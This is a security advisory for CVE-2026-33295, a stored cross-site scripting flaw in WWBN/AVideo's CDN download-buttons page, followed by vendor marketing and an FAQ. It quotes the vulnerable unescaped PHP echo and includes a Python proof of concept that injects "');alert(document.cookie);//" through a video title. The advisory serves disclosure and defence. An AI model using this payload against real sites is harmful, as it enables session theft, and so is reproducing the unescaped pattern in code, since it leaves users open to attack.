Summary
WWBN/AVideo contains a stored cross-site scripting vulnerability in the CDN plugin's download buttons component. The clean_title field of a video record is interpolated directly into a JavaScript string literal without any escaping, allowing an attacker who can create or modify a video to inject arbitrary JavaScript that executes in the browser of any user who visits the affected download page.
Details
At line 59 of the affected file, the following PHP code constructs a JavaScript function call:
downloadURLOrAlertError(url, {}, '<?php echo $video['clean_title']; ?>.' + format, progress);
The clean_title value is echoed verbatim inside a single-quoted JavaScript string literal. No JavaScript-context escaping is applied, such as wrapping with json_encode or htmlspecialchars with appropriate flags. Because the value sits inside a JS string delimited by single quotes, any input containing a single quote character allows an attacker to terminate the string prematurely and inject arbitrary JavaScript expressions. The clean_title field is derived from user-supplied video title input, meaning any user with video creation or editing privileges can craft a malicious title. The injected script executes in the security context of whatever user loads the download page for that video, which may include administrators or authenticated users with elevated privileges.
PoC
import requests
target = "https://example.com"
login_url = f"{target}/user"
upload_url = f"{target}/video/addNew"
session = requests.Session()
session.post(login_url, data={
"user[user]": "attacker",
"user[pass]": "attackerpassword"
})
malicious_title = "');alert(document.cookie);//"
session.post(upload_url, data={
"title": malicious_title,
"description": "poc"
})
After the video is created, navigate to:
https://example.com/plugin/CDN/downloadButtons.php?videos_id=<TARGET_VIDEO_ID>
The rendered page will contain:
downloadURLOrAlertError(url, {}, '');alert(document.cookie);//.' + format, progress);
Impact
Any user who can create or edit a video can store malicious JavaScript that will execute in the browser of any other user who visits the download page for that video. This includes scenarios where an attacker with a low-privilege account targets administrator sessions. Successful exploitation enables session cookie theft, credential harvesting, and actions performed on behalf of the victim within the application. Because the payload is stored server-side and triggers without further attacker interaction, all users who access download pages for attacker-controlled videos are at risk.
Untrusted input is rendered as active markup in a victim's browser, which can run script in their session. Typical impact: session or credential theft, and actions taken as the user.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
In the interim: Validate and encode untrusted input before rendering it as HTML. Applying a Content Security Policy reduces the impact if encoding is bypassed.
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-33295? CVE-2026-33295 is a high-severity cross-site scripting (XSS) vulnerability in wwbn/avideo (composer), affecting versions <= 25.0. No fixed version is listed yet. Untrusted input is rendered as active markup in a victim's browser, which can run script in their session.
- Which versions of wwbn/avideo are affected by CVE-2026-33295? wwbn/avideo (composer) versions <= 25.0 is affected.
- Is there a fix for CVE-2026-33295? No fixed version is listed for CVE-2026-33295 yet. Monitor the advisory for updates and apply mitigations in the interim.
- Is CVE-2026-33295 exploitable, and should I be worried? Whether CVE-2026-33295 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-33295 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-33295? No fixed version is listed yet. In the interim: Validate and encode untrusted input before rendering it as HTML. Applying a Content Security Policy reduces the impact if encoding is bypassed.